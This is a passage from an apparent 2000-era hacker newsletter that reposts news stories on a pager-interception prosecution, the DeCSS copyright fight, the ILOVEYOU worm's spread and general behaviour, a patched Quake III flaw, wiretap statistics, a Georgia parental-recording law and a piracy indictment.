that the law should not apply. Senior Judge Shirley Wohl Kram
disagreed and has refused to dismiss the case.
The National Law Journal
http://www.nylj.com/stories/00/05/050200a1.htm
Pager Eavesdropping Trial OK'd
BY MARK HAMBLETT New York Law Journal Tuesday, May 2, 2000
A CHALLENGE to a federal prosecution under the Electronics Communications
Privacy Act involving eavesdropping of alphanumeric pagers has been
rejected by a Southern District judge.
Senior Judge Shirley Wohl Kram refused to dismiss a case against a New
York City police officer who allegedly used software to read paging
messages by the police department.
Judge Kram rejected arguments by the officer that reading the pages is not
forbidden under the act, and that he was the victim of selective
prosecution in the case, United States v. Sills, 99 Cr. 1133.
Kevin Sills, a police officer for the city since 1996, was the subject of
a sting operation in 1998 by a criminal investigator working for the U.S.
Attorney's Office.
The two-count indictment charged that between 1996 and 1998, Mr. Sills
possessed software that was programmed to intercept alphanumeric pager
messages � a violation of �2512(1)(b) of the act. It also charged Mr.
Sills with violating �2511(1)(a) of the act by intercepting such messages.
The software, called "Message Tracker," is manufactured by a Texas company
called K & L Technology. When used in conjunction with a radio scanner,
Message Tracker can be used to intercept messages from the targeted pager
and display them on a computer.
In phone conversations with an employee of K & L Technology who was
cooperating with the investigator, Mr. Sills allegedly said that he had
been reading other pagers, asked the employee if the company would modify
his scanner so it worked in conjunction with a more advanced version of
Message Tracker and then ordered the modifications to be done.
Investigator Ronald G. Gardella, posing as a Federal Express delivery man,
then delivered to Mr. Sills' home his newly modified scanner and the
latest version of Message Tracker software. An ensuing search of the
premises allegedly turned up a computer file containing "Capcodes," which,
along with specific radio frequency, make up the electronic address for
pagers and distinguishes them from other pagers. Prosecutors charged that
one of the Capcodes in that file belonged to the pager used by the body
guard and driver for Police Commissioner Howard Safir.
Mr. Sills moved to dismiss the charges before Judge Kram.
First, he said his conduct was exempt under �2511(g) of the act, which
excludes any radio communication transmitted by any governmental, law
enforcement or public communications system "readily accessible to the
general public."
Quoting the statute, Judge Kram said the act defines "readily accessible"
as radio communications that are not "transmitted over a communication
system provided by a common carrier, unless the communication is a tone
only paging system communication."
Not 'Tone Only'
She said it was "undisputed" that the communications being intercepted by
Mr. Sills were not "tone only" transmissions, and therefore, the
transmissions at issue were not "readily accessible to the general
public."
Mr. Sills argued that he was singled out because he was a police officer
and said that "this case appears to be the first prosecution, in this
district or anywhere, involving alphanumeric pager interceptions when
there is no dissemination of the intercepted information."
He said the equipment he used was advertised on the open market and the
government has never chosen to prosecute news organizations and private
individuals who "knowingly pay for intercepted police pager
communications."
Mr. Sills said that when the government prosecuted the Breaking News
Network for profiting from the dissemination of intercepted pager
information, including police messages, the government did not prosecute
people or news organizations who paid for BNN's service.
Judge Kram disagreed.
"Whereas BNN's customers obtained pager messages through a purported
'service provider,' Sills directly intercepted them," she said.
Assistant U.S. Attorney David Raskin represented the government. Bradley
D. Simon represented Mr. Sills.
@HWA
151.0 [HNN] 2600 Secures Big Time Lawyer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 4th
contributed by jandrews
Emmanuel Goldstein has retained the services of New York lawyer Martin
Garbus in his case against the MPAA regarding his posting of DeCSS to
his web site. Garbus has defend such luminaries as Lenny Bruce,
Timothy Leary, and George Wallace. He has won all 20 of his arguments
before the Supreme Court. Garbus plans to argue that DeCSS is an
innovation in interoperability, and therefore protect under the "fair
use" principle of the First Amendment.
"There is little question in my mind this persecution of hackers is,
in many respect, analogous to the Communist red-baiting of yore. They
are being unfairly maligned, and stigmatized, without due cause." -
Martin Garbus
Village Voice
http://www.villagevoice.com/issues/0018/howe.shtml
DOWN BY LAW BY JEFF HOWE When Movie Moguls Wage War to Protect Copyright,
the First Amendment Ends Up on the Cutting Room Floor
n the world of Martin Garbus, we are all teachers and he is the student.
This at least partly explains why an otherwise innocent DVD player lies in
pieces on the coffee table in his Madison Avenue law office. The teacher
today is Chris DiBona, prominent evangelist of the open-source creed�the
belief that computer code, like speech, wants to be free.
DiBona is teaching Garbus, who only recently learned how to work his own
e-mail, why a miniscule bit of silicon in this player�and an equally
miniscule program built to bypass it�have sparked a federal case that will
determine whether we pass through the digital age with the First Amendment
intact.
As DiBona speaks, pointing at various organs in the innards of the DVD
player, Garbus leans forward and listens intently. Very intently. You can
almost hear the sound of files shifting and expanding inside Garbus's
cerebrum. The force of this man's concentration could bend spoons, or
laws. "I chose this life so I could forever remain a student," Garbus
says, in a not-infrequent display of mock humility.
This life, as it happens, has also allowed Garbus to remain a high-profile
rebel. Perhaps the closest thing in New York to a modern-day Daniel
Webster, Garbus has made a living by fighting the dark side in all its
forms. A laundry list of Garbus's clients reveals a Zelig-esque talent for
being on the right side of the right fight at the right time. Garbus
fought for Lenny Bruce in '64, for Timothy Leary in '66, and against
Alabama governor George Wallace in '68. A few years later he hid the
Pentagon Papers in his attic for reporter Daniel Ellsberg. He has argued
before the Supreme Court on 20 occasions, winning each time. Garbus has
fought to protect the copyright of work by Samuel Beckett, Robert Redford,
Al Pacino, and John Cheever.
The hacker's writer: Web scribe Eric Corley launched a First Amendment
fight when he posted a program that breaks the code of DVDs. So why
has Garbus, with his eye for the limelight and his zeal for the sanctity
of intellectual property, taken on the cause of a Long Island
cyberjournalist accused by the Motion Picture Association of America of
being a copyright thief?
"He gets it," says his client, Eric Corley, publisher of the quarterly
journal 2600 (www.2600.com), commonly referred to as the "hacker bible,"
and enemy number one of big Hollywood.
Last fall Corley, who goes by the nom de Net of Emmanuel Goldstein, posted
to 2600 a program that allows technology-savvy folk to decipher the code
of DVDs and then view the films on unlicensed players. The open-source set
calls this a First Amendment right. Hollywood calls it piracy and fears a
brave new world where people get their movies on the Web for free. In
January, the motion picture association slapped Corley and two other
defendants with a federal suit alleging copyright violation.
When Corley says Garbus "gets it," he's offering no light praise, since
factual error, bald deception, and simple misunderstanding have obscured
what initially looked like an open-and-shut case for the motion picture
industry. The movie moguls are banking on the Digital Millennium Copyright
Act of 1998, which expressly forbids providing anything "primarily
designed or produced for the purpose of circumventing a technological
measure that effectively controls access to a [copyrighted] work." In
plain English, that means you can't hand out a tool that breaks through
copyright protection.
The tool now in question is DeCSS, which appears to smash those barriers,
bypassing the Content Scrambling System that guards DVDs and allowing
users to do with the contents what they will.
Armed with that premise, Hollywood took round one by a rout in January, as
a federal district judge granted an injunction that blocked Corley and the
other defendants (who have since been dropped from the suit) from posting
DeCSS. But Corley battled back, posting a collection of links to sites
around the world willing to offer the program. That prompted the motion
picture association last month to ask that the injunction be extended to
ban such links.
By any account except Hollywood's, granting the request would be an
egregious gagging of free expression. A newspaper like this one, for
instance, would be forbidden from telling its readers how to find the
source code to DeCSS on cryptome.org. This so-called prior restraint is a
special bugbear of the fourth estate. No surprise, then, that The New York
Times has expressed its concern and may file a brief on behalf of Garbus
and his client.
For his part, Garbus will submit that DeCSS is an exercise in
cryptography, an innovation in interoperability, and protected speech to
boot. Under that argument, the program should be covered by the "fair use"
principle of the First Amendment�putting the Digital Millennium Copyright
Act and freedom of expression at irreconcilable odds.
The case for the defense does not look good. The entertainment industry is
garnering court victories in the fight between the right of commerce to
protect intellectual property and the right of Netizens like Corley to
speak their minds. Last week, a federal judge in New York ruled for the
Recording Industry Association of America in its copyright infringement
suit against MP3.com, which allows users to post and download CDs for
online listening.
Garbus knows lower courts are not often inclined to contradict Congress,
so he's already plotting strategies for appeal all the way to the Supreme
Court. The matter is being closely followed by Internet wonks, pundits,
and practitioners, not to mention those civil libertarians who "get it."
"If the judge finds for the plaintiff, and the decision isn't knocked down
on appeal," says Yochai Benkler, a professor of information law at New
York University, "it will create an environment that's closed like nothing
we've ever seen before."
Welcome to the latest front in the war for the First Amendment.
--------------------------------------------------------------------------
------
Eric Corley looks like a hacker. All stringy black hair, pale skin, and
hunched shoulders, Corley has the unmistakable pallor of someone who
spends most of his time alone in front of a computer screen. Hollywood
could not have picked a better physical specimen for their relentless
campaign to portray the open-source community�programmers and users of
operating systems and software whose source code is freely available�as
"thieves and pirates."
But Corley fails that test in one important regard: He does not hack. He
"couldn't hack his way into a paper bag," says one ex-hacker who,
naturally, chooses to remain anonymous.
No electronic trespasser, Corley is a journalist�and not one lacking in
considerable credentials. His journal 2600, founded in 1984, boasts a
circulation of 60,000. Between 10,000 and 15,000 visitors drop by the
site. Corley hosts a weekly radio broadcast and has appeared on numerous
talk shows, including Charlie Rose, Nightline, and 60 Minutes. He has
testified before Congress and written editorials for the Times and the
Daily News. He gave the commencement address when he graduated from SUNY
Stony Brook. He says the movie moguls didn't know how much fight they'd
get when they homed in on him. "It was foolish of them to pick [2600],"
Corley says. "We've always stood up against this kind of thing. We don't
know how to back down."
The fact that Corley is a scribe for the hacker world may make him a
likely suspect for the motion picture association, but not necessarily a
wise one. Corley counts among his admirers�and readers�countless
programmers and academics. Oddly, the same logic that made him a target
for the movie industry also made him a client that Garbus couldn't pass
up.
In the DVD trial, the First Amendment lawyer found a story with clearly
drawn opponents worthy of a pulp-fiction plot: a powerful, wealthy
industry versus a corps of overworked, denigrated protectors of civil
liberties. This is white hats against black hats, heroes facing up to
villains, good law butting heads with bad.
With self-righteous zeal, the motion picture association has harassed open
sourcers and free-speech advocates who have posted, or merely linked to,
the program once offered by Corley. Soon after Hollywood realized movie
discs had been hacked, they fired a salvo of cease-and-desist letters to
anyone offering DeCSS. On December 28, the trade organization in charge of
licensing movie rights for DVD players filed suit in California, naming 21
individuals and "Does 1-500, inclusive." That's Does as in John, a deft
bit of legal language that allows the plaintiff to attack retroactively
anyone it chooses. In mid January, Norwegian authorities raided the Oslo
home of 16-year-old Jon Johansen, who is accused of first providing DeCSS
on the Web.
From the beginning, the movie association has made little effort to
disguise its enmity toward the hacker community, calling them "nerds" and
"anarchists." The group has sent cease-and-desist letters to people in
Germany and Australia, places far outside the jurisdiction of injunctions
issued in the United States. A 2600 correspondent in Connecticut has been
targeted with another federal suit, and a University of Wisconsin student
was fired from his job at a computer lab after a letter from Hollywood
landed on his boss's desk.
For Garbus, the plight of the open-source community is clear. "There is
little question in my mind this persecution of hackers is, in many
respect, analogous to the Communist red-baiting of yore," he says. "They
are being unfairly maligned, and stigmatized, without due cause."
According to John Gilmore, the co-founder of the Electronic Frontier
Foundation, a civil-liberties group that has picked up the defense tab in
all the DVD suits, the program Corley posted was originally one part of an
open-source project to develop a movie disc player for the Linux operating
system favored by hardcore programmers. Linux supporters saw Hollywood's
tactics as a call to arms. They posted thousands of copies of DeCSS
throughout the Web as a show of support for Corley.
And if the online proliferation weren't enough, the lawyers representing
Hollywood accidentally entered the entire DeCSS source code into the
public record.
All this for a program that Corley and much of the computing community
insist doesn't even do what the film executives say it does: encourage the
copying of DVDs. Corley argues DeCSS exists solely to allow people to view
movies they own on unlicensed players, like ones that run on Linux�an
operating system Hollywood refused to license. "You have to wonder, why
are they so upset at people knowing how to use their technology?" Corley
says. "They don't care about copying. Copying is easy. People have been
copying for ages. There are whole warehouses in Asia copying DVDs and
nothing else."
Yet when the film industry first filed suit in California last November,
president Jack Valenti raised the specter of marauding hackers and thieves
out to defraud Hollywood. Valenti told Daily Variety: "[W]e don't have
broadband access today, so we don't have many [pirated] movies on the
Internet today . . . By the middle or end of next year, we will have an
avalanche."
But a month before Valenti's apocalypse was scheduled to appear, a lawyer
for the industry group admits he, the former deputy director of the
antipiracy division, has yet to uncover a single instance of piracy using
DeCSS. "Do I know of any incidents of piracy, personally? No," says Greg
Goeckner. "But I would have to check with my team in the field."
The movie association may have a hard time uncovering any pirates sailing
under the DeCSS flag. Gilmore, of the Electronic Frontier Foundation,
explains that DVD movies are far too big for easy duplication. "The only
place you could store your movie would be on your hard drive," he says,
"and even then you could only hold four such movies at most." Gilmore also
points out that it could take hundreds of hours to download a DVD over a
56k modem, so merely transferring these files would mean disabling your
computer for weeks, all for the purpose of gaining a bootleg copy of The
Matrix. The film association hasn't found any instances of DeCSS piracy
for one simple reason: There's no cause to do it.
--------------------------------------------------------------------------
------
If DeCSS isn't likely to be used for pirating movies, why does the program
pose a threat so dire that Hollywood turned to the courts for relief?
This will be one of Garbus's first questions, if he ever sees the
courtroom on Corley's behalf. On April 25, attorneys for the movie
association filed a motion to disqualify Garbus from the case. Garbus's
firm, it turns out, represents Scholastic in an unrelated case. Time
Warner, a member of the association, owns Scholastic, and you're not
supposed to defend and attack the same client at the same time. This
technicality may be enough to kick Garbus out of the suit. "He probably
has a 50-50 chance," speculated one legal observer close to the action.
If Hollywood wins, Garbus is gone, barred from appearing for Corley as
counsel. The Electronic Frontier Foundation and Corley go back to
soliciting solicitors, their appeal enhanced through association with
Garbus.
If the motion fails, the movie execs will have a formidable foe on their
hands. War is hell and so is law, and Garbus sees little difference
between the two.
But a firebrand trial lawyer isn't all Corley gets. Garbus is an icon of
"East Coast Code," a term coined by Lawrence Lessig to describe the legal
code. Garbus must now convince the court to consider the rights of "West
Coast Code," or source code.
He will argue that DeCSS falls under the First Amendment's fair-use
exception to the Copyright Act. The doctrine of fair use permits, for
example, a reporter to quote paragraphs from a book or print sections of a
pamphlet.
In the case of DVDs, the only way a consumer can copy specific portions is
to use DeCSS. Barring people from doing that is a more insidious
encroachment on individual liberty than it first appears. "Say you want to
criticize the liberal leanings of Hollywood, or criticize the sexist movie
of this or that," says Benkler, the NYU law professor. "You need to be
able to quote little pieces of the movie. You can do that under the
copyright law, because that's fair use, but using DVDs lawfully as the
[film association] reads the law, you can't do that. This really
extinguishes user privilege to an unprecedented degree."
This same privilege was tried�and survived�in an oft-cited suit in 1984
involving Betamax, which manufactured early video recorders. The question
then was the same one asked now: whether the entertainment industry's
right to safeguard its products carries more weight than the right of
individuals to access copyrighted works for their own expressive, and
protected, ends.
The First Amendment also protects a process called reverse-engineering,
which was used to create DeCSS. Reverse engineers take things apart in
order to learn how to put them back together in a better form.
In other words, to build a better mousetrap. The right to take things
apart�whether breakfast cereals or pharmaceutical compounds�is a
time-honored tenet in American law, held to encourage innovation.
So far, judges have been friendly to reverse engineers. This year, the
Ninth U.S. Circuit Court of Appeals ruled that Connectix's Virtual Game
Station, which allows Mac users to play Sony PlayStation games on their
computers, had not violated copyright law because it was
reverse-engineered from PlayStation.
In the case of DeCSS, the upshot is that the program is already out there.
The DVD encryption was a flimsy system that everyone in the open-source
world knew would be hacked, sooner rather than later. East Coast Code may
enjoin open-source programmers and "pirates" from posting and trading
DeCSS, but with an estimated 300,000 copies already in existence, only
West Coast Code, i.e., a better encryption scheme, is going to maintain
Big Hollywood's grip on user privilege. In the Wild, Wild Web, you're
responsible for your own fences. East Coast Code don't mean shit.
Tell us what you think. editor@villagevoice.com
@HWA
152.0 [HNN] Virus Says 'I Love You'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 4th
contributed by Evil Wench
A virus making the rounds of Asia is very similar to Melissa but has a
subject of "I Love You". The fast spreading virus has already hit
several dozen businesses in Hong Kong clogging their email systems.
Wall Street Journal - via ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2561663,00.html
'I love you' e-mail virus spreading
A Melissa-like computer virus, bearing the title 'I love you,' is
sweeping through Asia and appears to be spreading worldwide.
WSJ Interactive Edition May 4, 2000 4:40 AM PT
HONG KONG -- A computer virus spread by e-mail messages bearing the title
"I Love You" spread through Asian businesses Thursday afternoon, and
appeared to be quickly tainting computer systems world-wide. If the
attachment holding the virus is opened, the virus apparently multiplies by
finding other e-mail addresses and prompting the computer to generate new
e-mail. Victims sometimes receive dozens of e-mail messages, all
contaminated with the virus.
The virus, which appeared in Hong Kong late Thursday afternoon, seemed to
particularly hit, among other businesses, public relations firms and
investment banks. Dow Jones and the Asian Wall Street Journal offices in
Asia were among its victims.
In Hong Kong, Nomura International Ltd. is receiving the e-mail virus, an
analyst said. The virus has created a lot of damage in Nomura's London
office, he said. "It just multiplies through the system and eradicates
whole address books," the analyst said.
Simon Flint, currency strategist at Bank of America in Singapore, said he
has received e-mail messages warning him of the virus but hasn't received
the actual virus
@HWA
153.0 [HNN] Quake III Flaw Leaves Users Vulnerable
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 4th
contributed by Code Kid
Q security hole in Quake III could leave users vulnerable to internet
attack while they play the game. The hole could allow a malicious
server operator to overwrite any file on a client system. Id Software
was notified of the issue by Internet Security Systems, Inc. who held
off on announcing the hole until Id Software could issue a patch.
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2561554,00.html
Quake III flaw could frag your computer
Apply the patch now. Otherwise, a Trojan server could be shooting up your system while you play.
By Rob Lemos, ZDNet News May 3, 2000 5:34 PM PT
Game developer Id Software Inc. announced on Wednesday that its flagship
first-person shooter has a security flaw that could leave Quake III
players' computers open to attack while they play. "The basic nature
of the exploit is that malicious server operators could overwrite any file
on a client system," wrote Robert Duffy, a programmer at Id Software , in
his .plan file on Wednesday.
The flaw was found last week by network security firm Internet Security
Systems Inc. and could allow an attacker running a Quake III server to
read and write to any player's computer connecting that server. Internet
Security Systems waited until Id Software could issue a patch before
sending out an alert to users and the press.
"This vulnerability is important to network administrators who may be
unaware that users are accessing potentially malicious Quake3Arena servers
outside their network," wrote Internet Security Systems in the alert.
Id Software fixed the flaw in its latest patch release, Version 1.17,
released on Wednesday.
To force users to move over to the secured Quake III client, Id Software
has made Version 1.17 of the game incompatible with earlier -- and
insecure -- versions.
@HWA
154.0 [HNN] Phone Taps on the Rise
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 4th
contributed by Evil Wench and root66
Federal and State law enforcement agencies ordered 20% more wiretaps
last year on cell phones, pagers, fax machine, and email. The total
number of wiretaps ordered last year was 1,350 of which only 30% where
the traditional 'bug' hidden in a wall or clamped onto a phone line.
The rest where done digitally at the phone station or by eavesdropping
in electronically.
USA Today
US Courts
http://www.usatoday.com/life/cyber/tech/cth831.htm
http://www.uscourts.gov/Press_Releases/press_050100.html
06/07/00- Updated 07:51 PM ET
Technology boosts government wiretaps Fax machines, cell phones, pagers
and e-mail targeted
By Richard Willing, USA TODAY
WASHINGTON - Wiretaps ordered by federal and state authorities on cell
phones, pagers, fax machines and e-mail increased by nearly 20% last year,
pushing the total number of government wiretaps to a record 1,350.
Traditional wiretaps, such as microphones hidden in walls and "bugs"
planted on telephone lines, account for about one-third of all
surveillance devices, according to an annual wiretap survey released
Tuesday by the Administrative Office of the U.S. Courts.
Many of the taps were done by devices that pluck calls from the air or
eavesdrop at cellular phone switching stations.
Nearly three-quarters of the taps were ordered in narcotics
investigations, the report said.
The overall increase was fueled by improved surveillance technology and by
the continued aggressive use of taps by the Clinton administration
Department of Justice.
In 1999, the Justice Department got court permission to carry out 601
wiretaps, up from the 340 authorized in 1992, the year before Clinton took
office.
"Clinton supported wiretapping when he was governor of Arkansas, and
there's been a noticeable push since he became president," said David
Banisar, senior fellow of the Electronic Privacy Information Center, a
watchdog group in Washington.
"At the same time, you've got the explosion in cell phones happening,"
Banisar said. "Everyone is using them, including the people the police
want to intercept."
Justice Department spokeswoman Chris Watney said wiretaps were used in
fewer than 1% of the 50,000 criminal cases brought by the department last
year. "That shows you how selective we are in deciding when wiretaps are
necessary and appropriate," she said.
Under a 1968 federal law and separate laws in 42 states, police may obtain
permission to tap only by convincing a judge that the device would produce
evidence of a crime that could not be obtained any other way. No state or
federal request was turned down last year; three have been rejected since
1989.
Among the report's other findings:
Wiretaps sought by state and local authorities declined by 2% last year,
the first such decrease since 1995.
The overall increase in wiretaps produced more arrests in 1999 but a lower
conviction rate, about 15%.
Five states - New York, California, New Jersey, Pennsylvania and Illinois
- accounted for 81% of all state-ordered wiretaps approved last year.
Fourteen of the 42 states that authorize wiretaps ordered no taps.
Federal agents sought authority for seven e-mail taps last year, two more
than in 1998.
"Roving" taps, a recently authorized federal technique aimed at
individuals rather than phone or pager numbers, increased from 12 in 1998
to 23 last year.
The tendency to rely on wiretaps varied among prosecutors. Taps were used
extensively, for example, in federal drug investigations in central
California and southern Florida. New York City's Special Narcotics Bureau
got permission for 135 taps, more than any state other than New York.
New technology helped simplify the process of tapping cell phones.
Increasingly, cell phone tappers listen in at central switching stations
as calls are relayed to other cellular or hard-wired phones. Police also
use "trigger fish," devices that can pluck cell calls out of the air but
must be used near the caller.
-=-
NEWS RELEASE
Administrative Office of the U.S. Courts
May 1, 2000 Contact: Karen Redmond
Surveillance of Drug Offense Operations Drives 1999 Growth in
Applications for Wiretaps
The number of applications for wiretap orders requested in 1999 rose 2
percent to 1,350, up from 1,331 in 1998, according to the 1999 Wiretap
Report, A Report of the Director of the Administrative Office of the
United States Courts on Applications for Orders Authorizing or Approving
the Interception of Wire, Oral, or Electronic Communications. Federal or
state judges authorized all applications that were requested. In 1999,
violation of drug laws remained the major offense investigated through
wiretaps, with racketeering as the second largest category. The most
common location for the placement of wiretaps was in a single family
dwelling. In 1999, a total of 4,372 persons were reported arrested based
on interceptions of wire, oral, or electronic communications. The wiretap
report is submitted annually to Congress by the Administrative Office of
the U.S. Courts.
During 1999, 28 jurisdictions reported using wire, oral or electronic
surveillance as an investigative tool. The federal government, the
District of Columbia, the Virgin Islands and 42 states currently have laws
authorizing courts to issue orders permitting such surveillance. The
number of applications approved by federal courts in 1999 increased 6
percent, while approvals by state courts fell 2 percent below the 1998
levels. (See attached Table 1.)
Wiretap applications in New York (343 applications), California (76), New
Jersey (71), Pennsylvania (69), and Illinois (50) accounted for 81 percent
of all authorizations approved by state judges. Most state laws limit the
period of surveillance under an original order to 30 days, although
extensions may be granted. Among state wiretaps, the longest was a 510-day
intercept used in a racketeering investigation in New York County, New
York. The longest federal intercept occurred in the Western District of
Texas, where a 289-day wiretap was used in a narcotics investigation.
A total of 978 intercept applications, or 72 percent of all applications
for intercepts authorized in 1999, cited drug offenses as the most serious
offense under investigation. Several criminal offenses may be under
investigation, but only the most serious offense is named in an
application. The use of federal intercepts to conduct drug investigations
was most common in the Central District of California (38 applications)
and the Southern District of Florida (34 applications). On the state
level, the New York City Special Narcotics Bureau obtained authorizations
for 135 drug-related intercepts, which accounted for the highest
percentage of all drug-related intercepts reported by state or local
jurisdictions. Racketeering was cited in 139 of the applications, followed
by homicide/assault (62), and gambling (60). (See attached Table 7.)
In 1999, 18 percent of all intercept devices, or 248 wiretaps, were
authorized for single-family dwellings, a category that includes houses,
rowhouses, townhouses, and duplexes. Forty-nine percent of intercept
applications, or 663 applications, specified �other� locations. These may
include electronic wiretaps such as mobile telephones, electronic pagers,
and cellular telephones.
As of December 31, 1999, a total of 4,372 persons had been arrested based
on interceptions reported. Fifteen percent, or 654 persons, were
convicted. Federal wiretaps were responsible for the most arrests (66
percent) and convictions (55 percent). A wiretap in the Western District
of New York resulted in the arrest of 83 persons, the most arrests of any
intercept in 1999. A wiretap in the Southern District of Florida produced
the most convictions of any wiretap when an intercept used in a drug
investigation resulted in the conviction of 23 of the 26 persons arrested.
Among state intercepts, the intercept producing the most arrests took
place in Middlesex County, New Jersey, where an intercept in a drug
investigation resulted in the arrest of 72 persons.
Each federal and state judge is required to file a written report with the
Director of the Administrative Office of the U.S. Courts on each
application for an order authorizing the interception of a wire, oral, or
electronic communication (18 U.S.C. 2519(1)). No report to the
Administrative Office is required when an order is issued with the consent
of one of the principal parties to the communication.
A summary report on authorized intercepts is attached. The full report can
be found on the Judiciary�s website at www.uscourts.gov.
@HWA
155.0 [HNN] Minors Loose Rights In Georgia
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 4th
contributed by n0body
Georgia law now allows parents to record juveniles telephone and email
communications if they believe the child is involved in criminal
activity or otherwise in danger. (And what about the person who the
child is talking to, do they have any rights?)
APB Online
http://www.apbnews.com/safetycenter/family/2000/05/03/wiretap0503_01.html
Georgia Lets Parents Tap Kids' Phones Officials Say Safety, Criminal
Concerns Outweigh Privacy Issue May 3, 2000
By Randy Wyles
ATLANTA (APBnews.com) -- Parents and prosecutors in Georgia have a new
weapon in their fight to protect children from crime -- the right to
record juveniles' phone conversations.
Under a new law signed by Gov. Roy Barnes last week, parents can legally
record their children's private phone conversations and e-mails if they
believe the children are in danger or involved in criminal activity.
The legislation stems from a case in the Atlanta suburb of Marietta in
which the district attorney and the parents of a 13-year-old girl said a
former family friend molested the teen. The prosecutor in the case had
tried to introduce audio recordings into court as evidence of allegedly
inappropriate sexual phone conversations between the child and the
accused.
Kyle "Rick" Bishop, 40, was charged with aggravated child molestation and
aggravated sexual battery for the alleged affair with the girl.
"I guarantee if you or anyone else hears the tapes, there will be no doubt
in anyone's mind that he is guilty," said David C. Scott, the girl's
father.
Late-night calls led to visits
The girl was 11 when Bishop, a neighbor, allegedly began fostering a
relationship with her that Scott said he wanted to develop sexually.
Scott said Bishop claims his daughter pursued him. The girl's parents
became suspicious when late-night phone calls led to frequent visits by
the child to Bishop's home to watch television. So the parents began
eavesdropping and recording the phone conversations.
One night four years ago, Scott's wife listened in on a conversation that
shocked her.
"The nature of that conversation was so sexually explicit that my wife
immediately called the police after making my daughter hang up the
telephone," Scott said.
One party must know of tap
Bishop was arrested and charged. As part of his bond agreement, he was not
allowed within a mile of the family, which meant he had to move. The court
even refused to let him return to his home, forcing Bishop to arrange for
friends to move his belongings.
The case was finally placed on the court docket last year. But during a
pretrial hearing, Bishop's defense attorney filed a motion preventing the
tapes from being introduced as evidence, citing a violation of Georgia
privacy laws.
Georgia law permits a person to record phone conversations as long as one
of the parties involved with the call is aware it's being done. Bishop's
attorney contended neither the child nor Bishop knew the calls were being
recorded and that the parents did not have a right to record the
conversations, even though they were made on the Scotts' home phones and
involved their child.
The court ruled against the defense motion, but Bishop took it to the
Court of Appeals, which overturned the ruling in his favor. At the same
time, the Georgia Legislature took up the issue and passed a measure that
allows parents the right to record their children's conversations.
Can law be applied retroactively?
Meanwhile, Cobb County District Attorney Pat Head of Marietta, the
prosecutor in the case, filed a motion to overturn the Court of Appeals'
decision with the Georgia Supreme Court, which has yet to rule.
There is some debate as to whether the new law could actually be applied
retroactively to the very case that sparked the legislation.
"If [the Georgia Supreme Court] does affirm the Court of Appeals, then
we're taking the position that the law that has changed is procedural and
not substantive and that it does not affect any of [Bishop's]
constitutional rights nor any of his statutory rights, but is simply a
matter under which evidence is admitted in court," Head said.
But the district attorney still feels positive about the new law, no
matter how the case is resolved.
"Its a tool by which the parents are going to be given, at least, the
availability of keeping some control of their children and knowing what
their children are involved in," Head said.
As far as the Scotts are concerned, their hopes rest with Head, the
Georgia Supreme Court and the new law.
"I'm saddened that my daughter has had a number of years of her childhood
stolen from her," Scott said. "But it's just not part of my constitution
to want to take a baseball bat to somebody. Seeing this guy go to jail,
that makes me very, very gratified."
Randy Wyles is an APBnews.com correspondent in Atlanta.
@HWA
156.0 [HNN] 'I Love You'
~~~~~~~~~~~~~~~~~~
May 5th
contributed by Everybody
Technical Details
First, as soon as a user opens the worm file (usually by
double-clicking), the malicious code accesses the Microsoft Outlook
address book and sends a copy of itself to every entry. Second, the
worm copies itself into images (.jpg and .jpeg), Visual Basic scripts
(.vbs and .vbe) and Javascript (.je and .jse) deleting their previous
contents. Music files (.mp3 and .mp2) are hidden and a file of the
same name which contains the worm's script and a .vbs file extension
is put in its place. The worm will also infects files on networked and
mapped drives as well as sending itself to people who join a chat room
with an infected member (via mIRC). Finally, the virus will attempt to
contact one of four Web sites in the Philippines that supposedly have
a file called WIN-BUGSFIX.exe prepared for download. Those sites have
since been taken off line by the Internet service provider .
ZD Net
CNN
Reuters
Quick Facts
The virus/worm appears to have originated in the Philippines although
some reports now indicate Europe.
The malicious code spread around the world in approximately six hours.
CERT claims 300,000 infected computers at 250 sites world wide where
reported as of 2pm EST yesterday. This dwarfs Melissa's reach.
There are already at least three variants including one called 'joke'
and 'Susitikim'.
Various Links
People who have analyzed the code have said that its organization is
rather sloppy and it does not indicate good programing skills. Look
for yourself SANS has posted a copy of the source.
SANS
The hosting company of the four web pages pointed to by the virus/worm
have been taken off line by the ISP.
ZD Net
The CERT Advisory recommends that network administrators places
filters on "ILOVEYOU" in the email headers. (This will not stop the
variants though.)
CERT
Changing subject line defeats some filters.
C|Net
'I Love You' clean up expected to dwarf Melissa's $80 million price
tag.
C|Net
FW:Joke replacing ILOVEYOU in trip around the world.
MSNBC
Several anti-virus software vendors have set up 'I Love You"
information centers and they have posted new versions of their virus
definition files.
F-Secure
Symantec
BindView
http://www.zdnet.com/zdnn/stories/news/0,4586,2562483,00.html?chkpt
http://cnn.com/2000/TECH/computing/05/04/iloveyou/index.html
http://dailynews.yahoo.com/h/nm/20000504/ts/tech_virus.html
http://www.sans.org/y2k/050400-1100.htm
http://www.zdnet.com/zdnn/stories/news/0,4586,2562211,00.html
http://www.cert.org/advisories/CA-2000-04.html
http://news.cnet.com/news/0-1003-200-1815107.html?tag
http://news.cnet.com/news/0-1003-200-1814907.html?tag
http://www.msnbc.com/news/403350.asp?bt
http://www.msnbc.com/m/olk2k/
http://www.f-secure.com
http://www.symantec.com/avcenter/venc/data/vbs.loveletter.a.html
http://www.bindview.com/news/2000/0504.html
@HWA
157.0 [HNN] Microsoft Employee Busted for Piracy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 5th
contributed by acopalyse
A Chicago Grand Jury has indicted 17 people, including a former
employee of Microsoft and five employees of Intel for allegedly
infringing the copyright on more than 5,000 computer software
programs. 12 of the 17 were allegedly members of the group known as
'Pirates with Attitudes' (PWA), infiltrated by government agents last
year. PWA's alleged leader, Marlenus (Robin Rothberg), was also
indicted.
[ Yes PWA *did* influence our choice of a name for HWA and *no* we
do not have any official affiliation with the group or any of
its members past or present.. - Ed ]
ABC News
http://abcnews.go.com/sections/tech/DailyNews/Intel000504.html
Suspected Software
Thieves Indicted
Authorities Arrest Microsoft, Intel Employees
C H I C A G O, May 4 � Prosecutors today announced the indictment of a
global ring of suspected software thieves and five workers at chip maker
